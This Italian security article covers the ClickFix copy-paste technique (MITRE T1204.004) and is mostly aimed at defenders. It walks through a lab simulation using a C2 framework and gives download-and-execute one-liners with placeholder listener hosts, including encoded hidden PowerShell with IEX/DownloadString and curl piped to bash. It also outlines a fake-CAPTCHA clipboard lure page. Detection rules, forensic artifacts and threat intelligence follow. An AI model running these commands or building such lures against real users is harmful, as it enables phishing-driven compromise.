Copia e Incolla Malevolo: Malicious Copy and Paste (T1204.004)

La simulazione della strategia ClickFix in laboratorio è un esercizio prezioso per testare la resilienza degli utenti e la capacità di detection del SOC. L'obiettivo è costruire una catena credibile: pagina web → istruzione sociale → comando offuscato → callback C2.

Preparazione dell'infrastruttura di test. Per il lato server conviene utilizzare un framework C2. Havoc (open source) è direttamente pertinente, dato il suo impiego documentato in catene ClickFix via phishing. In alternativa, Sliver (open source) offre funzionalità analoghe con un setup rapido. Il listener va configurato su HTTPS per simulare uno scenario realistico di egress.

Costruzione del payload offuscato. Il comando che la vittima dovrà incollare deve sembrare innocuo ma concatenare download ed esecuzione. Su Windows, un classico one-liner PowerShell codificato in Base64 è il pattern più comune:

powershell -w hidden -enc <base64_del_payload>

Per generare la stringa Base64 da un comando in chiaro si può usare:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("IEX(New-Object Net.WebClient).DownloadString('<indirizzo_listener_C2>')"))

Su macOS e Linux la catena equivalente sfrutta curl con pipe verso l'interprete:

curl -s <indirizzo_listener_C2>/stage.sh | bash

Creazione della pagina ClickFix. Serve una pagina HTML che simuli un errore del browser o un CAPTCHA. L'elemento chiave è un bottone che, al clic, copi il payload nella clipboard dell'utente tramite l'API JavaScript navigator.clipboard.writeText(). Il messaggio accompagnatorio deve istruire l'utente ad aprire il dialogo Esegui (Win+R) o un terminale e incollare il contenuto. Tool come GoPhish (open source) semplificano la distribuzione via email di phishing, integrandosi con landing page personalizzate.

Variante con allegato email. Si può costruire un documento HTML o PDF che, una volta aperto, mostri un overlay con il falso errore e le istruzioni di copia-incolla. Questa variante testa specificamente i filtri email e le policy DLP.

Alcune accortezze operative per il lab: usare domini interni o con TLD riservati (.test), limitare il callback a reti isolate, e concordare con il Blue Team una finestra di esecuzione. Al termine, il report deve evidenziare quanti utenti hanno eseguito il comando e in quanto tempo il SOC ha generato l'alert — i due KPI fondamentali di questo tipo di engagement.

La detection di questa tecnica si basa su un principio semplice: un interprete di comandi non dovrebbe essere figlio diretto di un browser o di un client email con argomenti offuscati. L'analisi richiede la correlazione di almeno tre segnali in una finestra temporale stretta.

Log source essenziali. Su Windows servono quattro fonti attive e configurate: WinEventLog:Security (process creation con audit avanzato), WinEventLog:PowerShell (script block logging, EventID 4104), WinEventLog:Sysmon (EventID 1 per process creation, EventID 3 per connessioni di rete, EventID 11 per file creation). Sul fronte rete, i flussi NSM:Flow completano la visibilità sull'egress. Su Linux il riferimento è auditd:SYSCALL, su macOS Unified Log combinato con osquery (open source).

Logica di correlazione Windows (AN0962). La regola deve catturare questa sequenza entro 15 minuti: un processo browser o email client (chrome.exe, outlook.exe, msedge.exe, thunderbird.exe) come parent → spawn di powershell.exe, cmd.exe o mshta.exe → argomenti della command line contenenti pattern sospetti. I pattern critici da inserire nella lista SuspiciousArgPatterns sono:

• -enc o -EncodedCommand
• FromBase64String, IEX(, Invoke-Expression
• DownloadString, Invoke-WebRequest
• curl o wget con pipe verso sh, bash o powershell

A questo segnale iniziale va correlata la scrittura di file in directory ad alto rischio — %TEMP%, %APPDATA%, %PUBLIC% — seguita da una connessione outbound verso IP o domini non presenti nella baseline.

Logica Linux e macOS (AN0963, AN0964). Su Linux il focus è su processi terminale (gnome-terminal, konsole, tmux) che generano catene curl/wget con pipe verso bash/sh, seguiti da file drop in /tmp o ~/.cache e connessione di rete entro 10 minuti. Su macOS la detection è analoga: Terminal.app o iTerm2 come parent, con pattern come pbpaste, base64 -D, o curl ... | sh, e scritture in ~/Library o /tmp.

Gestione dei falsi positivi. Questo è il punto critico: sviluppatori e amministratori di sistema incollano comandi nel terminale quotidianamente. La chiave è la allowlist per utente/ruolo — gli account della popolazione non-tecnica che eseguono curl piped in bash sono anomalie vere. Per gli utenti tecnici, il discriminante diventa la combinazione con il download di file e l'egress verso domini non categorizzati.

I controlli preventivi complementari includono: application control tramite AppLocker o WDAC (inclusi in Windows, configurabili via GPO), PowerShell in Constrained Language Mode per utenti non amministratori, e web proxy con blocco dei download di file eseguibili da domini a bassa reputazione.

L'indagine su un incidente ClickFix ha una caratteristica peculiare: la catena di esecuzione inizia con un'azione volontaria dell'utente, il che rende fondamentale ricostruire il momento esatto del "paste" e la sequenza che ne deriva.

Artefatti Windows — la sequenza primaria. Il punto di partenza è Sysmon EventID 1 (Process Create): si cerca un processo powershell.exe o cmd.exe il cui campo ParentImage punti a un browser o un client email. Il campo CommandLine contiene il one-liner incollato — spesso un blob Base64 o una catena IEX(DownloadString(...)). Incrociando il timestamp con Sysmon EventID 11 (FileCreate) si individuano i file di primo stadio scritti in %TEMP% o %APPDATA%. Sysmon EventID 3 (NetworkConnect) rivela la connessione outbound verso il server C2, completando la triade esecuzione → drop → callback.

Il registro PowerShell/Operational con script block logging abilitato (EventID 4104) è spesso decisivo: anche se il comando iniziale è codificato in Base64, PowerShell registra il codice decodificato prima dell'esecuzione, fornendo il payload in chiaro. Se il Constrained Language Mode non era attivo, qui si trovano le istruzioni complete scaricate dal server remoto.

Artefatti del browser. La cronologia di navigazione e la cache del browser contengono la pagina ClickFix che ha innescato l'attacco. I database SQLite della cronologia (per Chromium: file History nel profilo utente) possono rivelare l'URL della landing page malevola e il timestamp della visita, da correlare con il process creation. La clipboard di Windows non mantiene uno storico persistente nativo, ma se l'organizzazione utilizza un clipboard manager, il contenuto incollato potrebbe essere ancora recuperabile.

Artefatti Linux e macOS. Su Linux, i log auditd con regole sulle syscall execve mostrano la catena di comandi: il terminale che invoca curl/wget, la pipe verso bash, e i processi figli. I file temporanei in /tmp e ~/.cache sono i candidati naturali per il primo stadio del malware — vanno acquisiti prima che il sistema li elimini al reboot. La bash history (~/.bash_history) può contenere il comando incollato, a meno che l'attaccante non abbia preposto uno spazio al comando per evitarne la registrazione.

Su macOS, lo Unified Log cattura gli eventi di esecuzione con granularità elevata. osquery (open source) permette interrogazioni strutturate su processi, connessioni di rete e file recenti. Un artefatto specifico è il contenuto della clipboard accessibile via pbpaste — se il sistema è ancora live, vale la pena acquisirlo prima di qualsiasi altra operazione.

Correlazione con il software noto. Se l'analisi del payload rivela l'uso di Havoc, si cercano i suoi artefatti specifici: il beacon in memoria, i named pipe utilizzati per la comunicazione inter-processo e le DLL caricate tramite reflective loading. La catena documentata per Havoc prevede proprio l'innesco via ClickFix in email di phishing, il che rende il profilo coerente se il vettore iniziale è un'email.

La tecnica T1204.004 è relativamente recente nel framework, ma il pattern ClickFix si sta diffondendo rapidamente come vettore di accesso iniziale. L'analisi dei dati disponibili rivela un panorama ancora ristretto ma significativo.

Contagious Interview (G1052) è il gruppo attualmente documentato nell'utilizzo di tattiche ClickFix per indurre le vittime a copiare e incollare codice malevolo. Questo gruppo è noto per le campagne che sfruttano false interviste di lavoro come pretesto di social engineering — un contesto in cui la vittima è particolarmente disposta a seguire istruzioni tecniche, come l'installazione di presunti software per videochiamate o la risoluzione di "errori tecnici" tramite comandi forniti dall'intervistatore. La convergenza tra ingegneria sociale mirata e ClickFix rende il gruppo particolarmente efficace contro target nel settore tecnologico e delle criptovalute.

Sul fronte del tooling, il framework Havoc (S1229) è il software associato: la sua catena di infezione viene innescata tramite lure ClickFix distribuiti via phishing. Havoc è un framework C2 open source con capacità avanzate — demon agent, BOF integration, sleep obfuscation — che lo rendono attraente per operatori con competenze medio-alte. Il fatto che sia open source lo rende accessibile anche ad attori meno strutturati, ampliando il bacino potenziale di utilizzo.

Pattern e proiezioni. La strategia ClickFix rappresenta un'evoluzione naturale dell'ingegneria sociale: invece di convincere l'utente ad aprire un file (dove intervengono le difese), lo si convince ad essere l'esecutore diretto. Questo shift ha implicazioni profonde perché neutralizza intere classi di controlli — sandbox email, mark-of-the-web, SmartScreen — in un solo passaggio. È ragionevole attendersi che altri gruppi adottino rapidamente questo pattern, specialmente per operazioni di initial access dove la priorità è il volume di compromissioni.

Il monitoraggio delle infrastrutture ClickFix (domini con pagine di falsi CAPTCHA o falsi messaggi di errore) attraverso fonti di threat intelligence, feed di domini sospetti e analisi di kit di phishing nei marketplace underground rappresenta la contromisura proattiva più efficace per anticipare campagne future. L'integrazione con indicatori derivati da Havoc — hash del beacon, pattern di comunicazione C2 — completa il profilo di intelligence operativa.

Framework MITRE ATT&CK v16 — Tecnica T1204.004, Gruppo G1052, Software S1229, Mitigazioni M1038, M1031, M1021, Detection ID DET0340 (AN0962, AN0963, AN0964). Integrato con conoscenza professionale per tool e procedure operative.